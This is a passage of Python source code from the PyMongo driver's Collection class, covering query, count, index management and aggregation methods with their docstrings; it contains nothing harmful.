Raises :class:`TypeError` if any of the arguments are of
improper type. Returns an instance of
:class:`~pymongo.cursor.Cursor` corresponding to this query.
The :meth:`find` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `filter` (optional): a SON object specifying elements which
must be present for a document to be included in the
result set
- `projection` (optional): a list of field names that should be
returned in the result set or a dict specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a dict to exclude fields from
the result (e.g. projection={'_id': False}).
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `skip` (optional): the number of documents to omit (from
the start of the result set) when returning the results
- `limit` (optional): the maximum number of results to
return
- `no_cursor_timeout` (optional): if False (the default), any
returned cursor is closed by the server after 10 minutes of
inactivity. If set to True, the returned cursor will never
time out on the server. Care should be taken to ensure that
cursors with no_cursor_timeout turned on are properly closed.
- `cursor_type` (optional): the type of cursor to return. The valid
options are defined by :class:`~pymongo.cursor.CursorType`:
- :attr:`~pymongo.cursor.CursorType.NON_TAILABLE` - the result of
this find call will return a standard cursor over the result set.
- :attr:`~pymongo.cursor.CursorType.TAILABLE` - the result of this
find call will be a tailable cursor - tailable cursors are only
for use with capped collections. They are not closed when the
last data is retrieved but are kept open and the cursor location
marks the final document position. If more data is received
iteration of the cursor will continue from the last document
received. For details, see the `tailable cursor documentation
<http://www.mongodb.org/display/DOCS/Tailable+Cursors>`_.
- :attr:`~pymongo.cursor.CursorType.TAILABLE_AWAIT` - the result
of this find call will be a tailable cursor with the await flag
set. The server will wait for a few seconds after returning the
full result set so that it can capture and return additional data
added during the query.
- :attr:`~pymongo.cursor.CursorType.EXHAUST` - the result of this
find call will be an exhaust cursor. MongoDB will stream batched
results to the client without waiting for the client to request
each batch, reducing latency. See notes on compatibility below.
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for this query. See
:meth:`~pymongo.cursor.Cursor.sort` for details.
- `allow_partial_results` (optional): if True, mongos will return
partial results if some shards are down instead of returning an
error.
- `oplog_replay` (optional): If True, set the oplogReplay query
flag.
- `batch_size` (optional): Limits the number of documents returned in
a single batch.
- `manipulate` (optional): **DEPRECATED** - If True (the default),
apply any outgoing SON manipulators before returning.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `return_key` (optional): If True, return only the index keys in
each document.
- `show_record_id` (optional): If True, adds a field ``$recordId`` in
each document with the storage engine's internal record identifier.
- `snapshot` (optional): **DEPRECATED** - If True, prevents the
cursor from returning a document more than once because of an
intervening write operation.
- `hint` (optional): An index, in the same format as passed to
:meth:`~pymongo.collection.Collection.create_index` (e.g.
``[('field', ASCENDING)]``). Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.hint` on the cursor to tell Mongo the
proper index to use for the query.
- `max_time_ms` (optional): Specifies a time limit for a query
operation. If the specified time is exceeded, the operation will be
aborted and :exc:`~pymongo.errors.ExecutionTimeout` is raised. Pass
this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.max_time_ms` on the cursor.
- `max_scan` (optional): **DEPRECATED** - The maximum number of
documents to scan. Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.max_scan` on the cursor.
- `min` (optional): A list of field, limit pairs specifying the
inclusive lower bound for all keys of a specific index in order.
Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.min` on the cursor.
- `max` (optional): A list of field, limit pairs specifying the
exclusive upper bound for all keys of a specific index in order.
Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.max` on the cursor.
- `comment` (optional): A string or document. Pass this as an
alternative to calling :meth:`~pymongo.cursor.Cursor.comment` on the
cursor.
- `modifiers` (optional): **DEPRECATED** - A dict specifying
additional MongoDB query modifiers. Use the keyword arguments listed
above instead.
.. note:: There are a number of caveats to using
:attr:`~pymongo.cursor.CursorType.EXHAUST` as cursor_type:
- The `limit` option can not be used with an exhaust cursor.
- Exhaust cursors are not supported by mongos and can not be
used with a sharded cluster.
- A :class:`~pymongo.cursor.Cursor` instance created with the
:attr:`~pymongo.cursor.CursorType.EXHAUST` cursor_type requires an
exclusive :class:`~socket.socket` connection to MongoDB. If the
:class:`~pymongo.cursor.Cursor` is discarded without being
completely iterated the underlying :class:`~socket.socket`
connection will be closed and discarded without being returned to
the connection pool.
.. versionchanged:: 3.7
Deprecated the `snapshot` option, which is deprecated in MongoDB
3.6 and removed in MongoDB 4.0.
Deprecated the `max_scan` option. Support for this option is
deprecated in MongoDB 4.0. Use `max_time_ms` instead to limit server
side execution time.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.5
Added the options `return_key`, `show_record_id`, `snapshot`,
`hint`, `max_time_ms`, `max_scan`, `min`, `max`, and `comment`.
Deprecated the option `modifiers`.
.. versionchanged:: 3.4
Support the `collation` option.
.. versionchanged:: 3.0
Changed the parameter names `spec`, `fields`, `timeout`, and
`partial` to `filter`, `projection`, `no_cursor_timeout`, and
`allow_partial_results` respectively.
Added the `cursor_type`, `oplog_replay`, and `modifiers` options.
Removed the `network_timeout`, `read_preference`, `tag_sets`,
`secondary_acceptable_latency_ms`, `max_scan`, `snapshot`,
`tailable`, `await_data`, `exhaust`, `as_class`, and slave_okay
parameters. Removed `compile_re` option: PyMongo now always
represents BSON regular expressions as :class:`~bson.regex.Regex`
objects. Use :meth:`~bson.regex.Regex.try_compile` to attempt to
convert from a BSON regular expression to a Python regular
expression object. Soft deprecated the `manipulate` option.
.. versionchanged:: 2.7
Added `compile_re` option. If set to False, PyMongo represented BSON
regular expressions as :class:`~bson.regex.Regex` objects instead of
attempting to compile BSON regular expressions as Python native
regular expressions, thus preventing errors for some incompatible
patterns, see `PYTHON-500`_.
.. versionadded:: 2.3
The `tag_sets` and `secondary_acceptable_latency_ms` parameters.
.. _PYTHON-500: https://jira.mongodb.org/browse/PYTHON-500
.. mongodoc:: find
"""
return Cursor(self, *args, **kwargs)
def find_raw_batches(self, *args, **kwargs):
"""Query the database and retrieve batches of raw BSON.
Similar to the :meth:`find` method but returns a
:class:`~pymongo.cursor.RawBatchCursor`.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
>>> import bson
>>> cursor = db.test.find_raw_batches()
>>> for batch in cursor:
... print(bson.decode_all(batch))
.. note:: find_raw_batches does not support sessions.
.. versionadded:: 3.6
"""
# OP_MSG with document stream returns is required to support
# sessions.
if "session" in kwargs:
raise ConfigurationError(
"find_raw_batches does not support sessions")
return RawBatchCursor(self, *args, **kwargs)
def parallel_scan(self, num_cursors, session=None, **kwargs):
"""**DEPRECATED**: Scan this entire collection in parallel.
Returns a list of up to ``num_cursors`` cursors that can be iterated
concurrently. As long as the collection is not modified during
scanning, each document appears once in one of the cursors result
sets.
For example, to process each document in a collection using some
thread-safe ``process_document()`` function:
>>> def process_cursor(cursor):
... for document in cursor:
... # Some thread-safe processing function:
... process_document(document)
>>>
>>> # Get up to 4 cursors.
...
>>> cursors = collection.parallel_scan(4)
>>> threads = [
... threading.Thread(target=process_cursor, args=(cursor,))
... for cursor in cursors]
>>>
>>> for thread in threads:
... thread.start()
>>>
>>> for thread in threads:
... thread.join()
>>>
>>> # All documents have now been processed.
The :meth:`parallel_scan` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `num_cursors`: the number of cursors to return
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs`: additional options for the parallelCollectionScan
command can be passed as keyword arguments.
.. note:: Requires server version **>= 2.5.5**.
.. versionchanged:: 3.7
Deprecated.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added back support for arbitrary keyword arguments. MongoDB 3.4
adds support for maxTimeMS as an option to the
parallelCollectionScan command.
.. versionchanged:: 3.0
Removed support for arbitrary keyword arguments, since
the parallelCollectionScan command has no optional arguments.
"""
warnings.warn("parallel_scan is deprecated. MongoDB 4.2 will remove "
"the parallelCollectionScan command.",
DeprecationWarning, stacklevel=2)
cmd = SON([('parallelCollectionScan', self.__name),
('numCursors', num_cursors)])
cmd.update(kwargs)
with self._socket_for_reads(session) as (sock_info, slave_ok):
# We call sock_info.command here directly, instead of
# calling self._command to avoid using an implicit session.
result = sock_info.command(
self.__database.name,
cmd,
slave_ok,
self._read_preference_for(session),
self.codec_options,
read_concern=self.read_concern,
parse_write_concern_error=True,
session=session,
client=self.__database.client)
cursors = []
for cursor in result['cursors']:
cursors.append(CommandCursor(
self, cursor['cursor'], sock_info.address,
session=session, explicit_session=session is not None))
return cursors
def _count(self, cmd, collation=None, session=None):
"""Internal count helper."""
with self._socket_for_reads(session) as (sock_info, slave_ok):
res = self._command(
sock_info,
cmd,
slave_ok,
allowable_errors=["ns missing"],
codec_options=self.__write_response_codec_options,
read_concern=self.read_concern,
collation=collation,
session=session)
if res.get("errmsg", "") == "ns missing":
return 0
return int(res["n"])
def _aggregate_one_result(
self, sock_info, slave_ok, cmd, collation=None, session=None):
"""Internal helper to run an aggregate that returns a single result."""
result = self._command(
sock_info,
cmd,
slave_ok,
codec_options=self.__write_response_codec_options,
read_concern=self.read_concern,
collation=collation,
session=session)
batch = result['cursor']['firstBatch']
return batch[0] if batch else None
def estimated_document_count(self, **kwargs):
"""Get an estimate of the number of documents in this collection using
collection metadata.
The :meth:`estimated_document_count` method is **not** supported in a
transaction.
All optional parameters should be passed as keyword arguments
to this method. Valid options include:
- `maxTimeMS` (int): The maximum amount of time to allow this
operation to run, in milliseconds.
:Parameters:
- `**kwargs` (optional): See list of options above.
.. versionadded:: 3.7
"""
if 'session' in kwargs:
raise ConfigurationError(
'estimated_document_count does not support sessions')
cmd = SON([('count', self.__name)])
cmd.update(kwargs)
return self._count(cmd)
def count_documents(self, filter, session=None, **kwargs):
"""Count the number of documents in this collection.
The :meth:`count_documents` method is supported in a transaction.
All optional parameters should be passed as keyword arguments
to this method. Valid options include:
- `skip` (int): The number of matching documents to skip before
returning results.
- `limit` (int): The maximum number of documents to count.
- `maxTimeMS` (int): The maximum amount of time to allow this
operation to run, in milliseconds.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `hint` (string or list of tuples): The index to use. Specify either
the index name as a string or the index specification as a list of
tuples (e.g. [('a', pymongo.ASCENDING), ('b', pymongo.ASCENDING)]).
This option is only supported on MongoDB 3.6 and above.
The :meth:`count_documents` method obeys the :attr:`read_preference` of
this :class:`Collection`.
.. note:: When migrating from :meth:`count` to :meth:`count_documents`
the following query operators must be replaced:
+-------------+-------------------------------------+
| Operator | Replacement |
+=============+=====================================+
| $where | `$expr`_ |
+-------------+-------------------------------------+
| $near | `$geoWithin`_ with `$center`_ |
+-------------+-------------------------------------+
| $nearSphere | `$geoWithin`_ with `$centerSphere`_ |
+-------------+-------------------------------------+
$expr requires MongoDB 3.6+
:Parameters:
- `filter` (required): A query document that selects which documents
to count in the collection. Can be an empty document to count all
documents.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
.. versionadded:: 3.7
.. _$expr: https://docs.mongodb.com/manual/reference/operator/query/expr/
.. _$geoWithin: https://docs.mongodb.com/manual/reference/operator/query/geoWithin/
.. _$center: https://docs.mongodb.com/manual/reference/operator/query/center/#op._S_center
.. _$centerSphere: https://docs.mongodb.com/manual/reference/operator/query/centerSphere/#op._S_centerSphere
"""
pipeline = [{'$match': filter}]
if 'skip' in kwargs:
pipeline.append({'$skip': kwargs.pop('skip')})
if 'limit' in kwargs:
pipeline.append({'$limit': kwargs.pop('limit')})
pipeline.append({'$group': {'_id': None, 'n': {'$sum': 1}}})
cmd = SON([('aggregate', self.__name),
('pipeline', pipeline),
('cursor', {})])
if "hint" in kwargs and not isinstance(kwargs["hint"], string_type):
kwargs["hint"] = helpers._index_document(kwargs["hint"])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
with self._socket_for_reads(session) as (sock_info, slave_ok):
result = self._aggregate_one_result(
sock_info, slave_ok, cmd, collation, session)
if not result:
return 0
return result['n']
def count(self, filter=None, session=None, **kwargs):
"""**DEPRECATED** - Get the number of documents in this collection.
The :meth:`count` method is deprecated and **not** supported in a
transaction. Please use :meth:`count_documents` or
:meth:`estimated_document_count` instead.
All optional count parameters should be passed as keyword arguments
to this method. Valid options include:
- `skip` (int): The number of matching documents to skip before
returning results.
- `limit` (int): The maximum number of documents to count.
- `maxTimeMS` (int): The maximum amount of time to allow the count
command to run, in milliseconds.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `hint` (string or list of tuples): The index to use. Specify either
the index name as a string or the index specification as a list of
tuples (e.g. [('a', pymongo.ASCENDING), ('b', pymongo.ASCENDING)]).
The :meth:`count` method obeys the :attr:`read_preference` of
this :class:`Collection`.
.. note:: When migrating from :meth:`count` to :meth:`count_documents`
the following query operators must be replaced:
+-------------+-------------------------------------+
| Operator | Replacement |
+=============+=====================================+
| $where | `$expr`_ |
+-------------+-------------------------------------+
| $near | `$geoWithin`_ with `$center`_ |
+-------------+-------------------------------------+
| $nearSphere | `$geoWithin`_ with `$centerSphere`_ |
+-------------+-------------------------------------+
$expr requires MongoDB 3.6+
:Parameters:
- `filter` (optional): A query document that selects which documents
to count in the collection.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
.. versionchanged:: 3.7
Deprecated.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Support the `collation` option.
.. _$expr: https://docs.mongodb.com/manual/reference/operator/query/expr/
.. _$geoWithin: https://docs.mongodb.com/manual/reference/operator/query/geoWithin/
.. _$center: https://docs.mongodb.com/manual/reference/operator/query/center/#op._S_center
.. _$centerSphere: https://docs.mongodb.com/manual/reference/operator/query/centerSphere/#op._S_centerSphere
"""
warnings.warn("count is deprecated. Use estimated_document_count or "
"count_documents instead. Please note that $where must "
"be replaced by $expr, $near must be replaced by "
"$geoWithin with $center, and $nearSphere must be "
"replaced by $geoWithin with $centerSphere",
DeprecationWarning, stacklevel=2)
cmd = SON([("count", self.__name)])
if filter is not None:
if "query" in kwargs:
raise ConfigurationError("can't pass both filter and query")
kwargs["query"] = filter
if "hint" in kwargs and not isinstance(kwargs["hint"], string_type):
kwargs["hint"] = helpers._index_document(kwargs["hint"])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
return self._count(cmd, collation, session)
def create_indexes(self, indexes, session=None, **kwargs):
"""Create one or more indexes on this collection.
>>> from pymongo import IndexModel, ASCENDING, DESCENDING
>>> index1 = IndexModel([("hello", DESCENDING),
... ("world", ASCENDING)], name="hello_world")
>>> index2 = IndexModel([("goodbye", DESCENDING)])
>>> db.test.create_indexes([index1, index2])
["hello_world", "goodbye_-1"]
:Parameters:
- `indexes`: A list of :class:`~pymongo.operations.IndexModel`
instances.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the createIndexes
command (like maxTimeMS) can be passed as keyword arguments.
.. note:: `create_indexes` uses the `createIndexes`_ command
introduced in MongoDB **2.6** and cannot be used with earlier
versions.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
.. versionadded:: 3.0
.. _createIndexes: https://docs.mongodb.com/manual/reference/command/createIndexes/
"""
common.validate_list('indexes', indexes)
names = []
with self._socket_for_writes() as sock_info:
supports_collations = sock_info.max_wire_version >= 5
def gen_indexes():
for index in indexes:
if not isinstance(index, IndexModel):
raise TypeError(
"%r is not an instance of "
"pymongo.operations.IndexModel" % (index,))
document = index.document
if "collation" in document and not supports_collations:
raise ConfigurationError(
"Must be connected to MongoDB "
"3.4+ to use collations.")
names.append(document["name"])
yield document
cmd = SON([('createIndexes', self.name),
('indexes', list(gen_indexes()))])
cmd.update(kwargs)
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
codec_options=_UNICODE_REPLACE_CODEC_OPTIONS,
write_concern=self._write_concern_for(session),
session=session)
return names
def __create_index(self, keys, index_options, session, **kwargs):
"""Internal create index helper.
:Parameters:
- `keys`: a list of tuples [(key, type), (key, type), ...]
- `index_options`: a dict of index options.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
"""
index_doc = helpers._index_document(keys)
index = {"key": index_doc}
collation = validate_collation_or_none(
index_options.pop('collation', None))
index.update(index_options)
with self._socket_for_writes() as sock_info:
if collation is not None:
if sock_info.max_wire_version < 5:
raise ConfigurationError(
'Must be connected to MongoDB 3.4+ to use collations.')
else:
index['collation'] = collation
cmd = SON([('createIndexes', self.name), ('indexes', [index])])
cmd.update(kwargs)
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
codec_options=_UNICODE_REPLACE_CODEC_OPTIONS,
write_concern=self._write_concern_for(session),
session=session)
def create_index(self, keys, session=None, **kwargs):
"""Creates an index on this collection.
Takes either a single key or a list of (key, direction) pairs.
The key(s) must be an instance of :class:`basestring`
(:class:`str` in python 3), and the direction(s) must be one of
(:data:`~pymongo.ASCENDING`, :data:`~pymongo.DESCENDING`,
:data:`~pymongo.GEO2D`, :data:`~pymongo.GEOHAYSTACK`,
:data:`~pymongo.GEOSPHERE`, :data:`~pymongo.HASHED`,
:data:`~pymongo.TEXT`).
To create a single key ascending index on the key ``'mike'`` we just
use a string argument::
>>> my_collection.create_index("mike")
For a compound index on ``'mike'`` descending and ``'eliot'``
ascending we need to use a list of tuples::
>>> my_collection.create_index([("mike", pymongo.DESCENDING),
... ("eliot", pymongo.ASCENDING)])
All optional index creation parameters should be passed as
keyword arguments to this method. For example::
>>> my_collection.create_index([("mike", pymongo.DESCENDING)],
... background=True)
Valid options include, but are not limited to:
- `name`: custom name to use for this index - if none is
given, a name will be generated.
- `unique`: if ``True`` creates a uniqueness constraint on the index.
- `background`: if ``True`` this index should be created in the
background.
- `sparse`: if ``True``, omit from the index any documents that lack
the indexed field.
- `bucketSize`: for use with geoHaystack indexes.
Number of documents to group together within a certain proximity
to a given longitude and latitude.
- `min`: minimum value for keys in a :data:`~pymongo.GEO2D`
index.
- `max`: maximum value for keys in a :data:`~pymongo.GEO2D`
index.
- `expireAfterSeconds`: <int> Used to create an expiring (TTL)
collection. MongoDB will automatically delete documents from
this collection after <int> seconds. The indexed field must
be a UTC datetime or the data will not expire.
- `partialFilterExpression`: A document that specifies a filter for
a partial index.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
See the MongoDB documentation for a full list of supported options by
server version.
.. warning:: `dropDups` is not supported by MongoDB 3.0 or newer. The
option is silently ignored by the server and unique index builds
using the option will fail if a duplicate value is detected.
.. note:: `partialFilterExpression` requires server version **>= 3.2**
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
:Parameters:
- `keys`: a single key or a list of (key, direction)
pairs specifying the index to create
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): any additional index creation
options (see the above list) should be passed as keyword
arguments
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for passing maxTimeMS
in kwargs.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4. Support the `collation` option.
.. versionchanged:: 3.2
Added partialFilterExpression to support partial indexes.
.. versionchanged:: 3.0
Renamed `key_or_list` to `keys`. Removed the `cache_for` option.
:meth:`create_index` no longer caches index names. Removed support
for the drop_dups and bucket_size aliases.
.. mongodoc:: indexes
"""
keys = helpers._index_list(keys)
name = kwargs.setdefault("name", helpers._gen_index_name(keys))
cmd_options = {}
if "maxTimeMS" in kwargs:
cmd_options["maxTimeMS"] = kwargs.pop("maxTimeMS")
self.__create_index(keys, kwargs, session, **cmd_options)
return name
def ensure_index(self, key_or_list, cache_for=300, **kwargs):
"""**DEPRECATED** - Ensures that an index exists on this collection.
.. versionchanged:: 3.0
**DEPRECATED**
"""
warnings.warn("ensure_index is deprecated. Use create_index instead.",
DeprecationWarning, stacklevel=2)
# The types supported by datetime.timedelta.
if not (isinstance(cache_for, integer_types) or
isinstance(cache_for, float)):
raise TypeError("cache_for must be an integer or float.")
if "drop_dups" in kwargs:
kwargs["dropDups"] = kwargs.pop("drop_dups")
if "bucket_size" in kwargs:
kwargs["bucketSize"] = kwargs.pop("bucket_size")
keys = helpers._index_list(key_or_list)
name = kwargs.setdefault("name", helpers._gen_index_name(keys))
# Note that there is a race condition here. One thread could
# check if the index is cached and be preempted before creating
# and caching the index. This means multiple threads attempting
# to create the same index concurrently could send the index
# to the server two or more times. This has no practical impact
# other than wasted round trips.
if not self.__database.client._cached(self.__database.name,
self.__name, name):
self.__create_index(keys, kwargs, session=None)
self.__database.client._cache_index(self.__database.name,
self.__name, name, cache_for)
return name
return None
def drop_indexes(self, session=None, **kwargs):
"""Drops all indexes on this collection.
Can be used on non-existant collections or collections with no indexes.
Raises OperationFailure on an error.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the createIndexes
command (like maxTimeMS) can be passed as keyword arguments.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
"""
self.__database.client._purge_index(self.__database.name, self.__name)
self.drop_index("*", session=session, **kwargs)
def drop_index(self, index_or_name, session=None, **kwargs):
"""Drops the specified index on this collection.
Can be used on non-existant collections or collections with no
indexes. Raises OperationFailure on an error (e.g. trying to
drop an index that does not exist). `index_or_name`
can be either an index name (as returned by `create_index`),
or an index specifier (as passed to `create_index`). An index
specifier should be a list of (key, direction) pairs. Raises
TypeError if index is not an instance of (str, unicode, list).
.. warning::
if a custom name was used on index creation (by
passing the `name` parameter to :meth:`create_index` or
:meth:`ensure_index`) the index **must** be dropped by name.
:Parameters:
- `index_or_name`: index (or name of index) to drop
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the createIndexes
command (like maxTimeMS) can be passed as keyword arguments.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
"""
name = index_or_name
if isinstance(index_or_name, list):
name = helpers._gen_index_name(index_or_name)
if not isinstance(name, string_type):
raise TypeError("index_or_name must be an index name or list")
self.__database.client._purge_index(
self.__database.name, self.__name, name)
cmd = SON([("dropIndexes", self.__name), ("index", name)])
cmd.update(kwargs)
with self._socket_for_writes() as sock_info:
self._command(sock_info,
cmd,
read_preference=ReadPreference.PRIMARY,
allowable_errors=["ns not found"],
write_concern=self._write_concern_for(session),
session=session)
def reindex(self, session=None, **kwargs):
"""Rebuilds all indexes on this collection.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the reIndex
command (like maxTimeMS) can be passed as keyword arguments.
.. warning:: reindex blocks all other operations (indexes
are built in the foreground) and will be slow for large
collections.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
.. versionchanged:: 3.5
We no longer apply this collection's write concern to this operation.
MongoDB 3.4 silently ignored the write concern. MongoDB 3.6+ returns
an error if we include the write concern.
"""
cmd = SON([("reIndex", self.__name)])
cmd.update(kwargs)
with self._socket_for_writes() as sock_info:
return self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
session=session)
def list_indexes(self, session=None):
"""Get a cursor over the index documents for this collection.
>>> for index in db.test.list_indexes():
... print(index)
...
SON([(u'v', 1), (u'key', SON([(u'_id', 1)])),
(u'name', u'_id_'), (u'ns', u'test.test')])
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
An instance of :class:`~pymongo.command_cursor.CommandCursor`.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionadded:: 3.0
"""
codec_options = CodecOptions(SON)
coll = self.with_options(codec_options=codec_options,
read_preference=ReadPreference.PRIMARY)
sock_ctx, read_pref = self._socket_for_primary_reads(session)
with sock_ctx as (sock_info, slave_ok):
cmd = SON([("listIndexes", self.__name), ("cursor", {})])
if sock_info.max_wire_version > 2:
with self.__database.client._tmp_session(session, False) as s:
try:
cursor = self._command(sock_info, cmd, slave_ok,
read_pref,
codec_options,
session=s)["cursor"]
except OperationFailure as exc:
# Ignore NamespaceNotFound errors to match the behavior
# of reading from *.system.indexes.
if exc.code != 26:
raise
cursor = {'id': 0, 'firstBatch': []}
return CommandCursor(coll, cursor, sock_info.address,
session=s,
explicit_session=session is not None)
else:
res = message._first_batch(
sock_info, self.__database.name, "system.indexes",
{"ns": self.__full_name}, 0, slave_ok, codec_options,
read_pref, cmd,
self.database.client._event_listeners)
cursor = res["cursor"]
# Note that a collection can only have 64 indexes, so there
# will never be a getMore call.
return CommandCursor(coll, cursor, sock_info.address)
def index_information(self, session=None):
"""Get information on this collection's indexes.
Returns a dictionary where the keys are index names (as
returned by create_index()) and the values are dictionaries
containing information about each index. The dictionary is
guaranteed to contain at least a single key, ``"key"`` which
is a list of (key, direction) pairs specifying the index (as
passed to create_index()). It will also contain any other
metadata about the indexes, except for the ``"ns"`` and
``"name"`` keys, which are cleaned. Example output might look
like this:
>>> db.test.create_index("x", unique=True)
u'x_1'
>>> db.test.index_information()
{u'_id_': {u'key': [(u'_id', 1)]},
u'x_1': {u'unique': True, u'key': [(u'x', 1)]}}
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
.. versionchanged:: 3.6
Added ``session`` parameter.
"""
cursor = self.list_indexes(session=session)
info = {}
for index in cursor:
index["key"] = index["key"].items()
index = dict(index)
info[index.pop("name")] = index
return info
def options(self, session=None):
"""Get the options set on this collection.
Returns a dictionary of options and their values - see
:meth:`~pymongo.database.Database.create_collection` for more
information on the possible options. Returns an empty
dictionary if the collection has not been created yet.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
.. versionchanged:: 3.6
Added ``session`` parameter.
"""
dbo = self.__database.client.get_database(
self.__database.name,
self.codec_options,
self.read_preference,
self.write_concern,
self.read_concern)
cursor = dbo.list_collections(
session=session, filter={"name": self.__name})
result = None
for doc in cursor:
result = doc
break
if not result:
return {}
options = result.get("options", {})
if "create" in options:
del options["create"]
return options
def _aggregate(self, pipeline, cursor_class, first_batch_size, session,
explicit_session, **kwargs):
common.validate_list('pipeline', pipeline)
if "explain" in kwargs:
raise ConfigurationError("The explain option is not supported. "
"Use Database.command instead.")
collation = validate_collation_or_none(kwargs.pop('collation', None))
max_await_time_ms = kwargs.pop('maxAwaitTimeMS', None)
cmd = SON([("aggregate", self.__name),
("pipeline", pipeline)])
# Remove things that are not command options.
use_cursor = True
if "useCursor" in kwargs:
warnings.warn(
"The useCursor option is deprecated "
"and will be removed in PyMongo 4.0",
DeprecationWarning, stacklevel=2)
use_cursor = common.validate_boolean(
"useCursor", kwargs.pop("useCursor"))
batch_size = common.validate_non_negative_integer_or_none(
"batchSize", kwargs.pop("batchSize", None))
# If the server does not support the "cursor" option we
# ignore useCursor and batchSize.
with self._socket_for_reads(session) as (sock_info, slave_ok):
dollar_out = pipeline and '$out' in pipeline[-1]
if use_cursor:
if "cursor" not in kwargs:
kwargs["cursor"] = {}
# Ignore batchSize when the $out pipeline stage is used.
# batchSize is meaningless in that case since the server
# doesn't return results. This also avoids SERVER-23923.
if first_batch_size is not None and not dollar_out:
kwargs["cursor"]["batchSize"] = first_batch_size
cmd.update(kwargs)
# Apply this Collection's read concern if $out is not in the
# pipeline.
if (sock_info.max_wire_version >= 4
and 'readConcern' not in cmd
and not dollar_out):
read_concern = self.read_concern
else:
read_concern = None
if 'writeConcern' not in cmd and dollar_out:
write_concern = self._write_concern_for(session)
else:
write_concern = None
# Avoid auto-injecting a session: aggregate() passes a session,
# aggregate_raw_batches() passes none.
result = sock_info.command(
self.__database.name,
cmd,
slave_ok,
self._read_preference_for(session),
self.codec_options,
parse_write_concern_error=True,
read_concern=read_concern,
write_concern=write_concern,
collation=collation,
session=session,
client=self.__database.client)
if "cursor" in result:
cursor = result["cursor"]
else:
# Pre-MongoDB 2.6 or unacknowledged write. Fake a cursor.
cursor = {
"id": 0,
"firstBatch": result.get("result", []),
"ns": self.full_name,
}
return cursor_class(
self, cursor, sock_info.address,
batch_size=batch_size or 0,
max_await_time_ms=max_await_time_ms,
session=session, explicit_session=explicit_session)
def aggregate(self, pipeline, session=None, **kwargs):
"""Perform an aggregation using the aggregation framework on this
collection.
All optional `aggregate command`_ parameters should be passed as
keyword arguments to this method. Valid options include, but are not
limited to:
- `allowDiskUse` (bool): Enables writing to temporary files. When set
to True, aggregation stages can write data to the _tmp subdirectory
of the --dbpath directory. The default is False.
- `maxTimeMS` (int): The maximum amount of time to allow the operation
to run in milliseconds.
- `batchSize` (int): The maximum number of documents to return per
batch. Ignored if the connected mongod or mongos does not support
returning aggregate results using a cursor, or `useCursor` is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
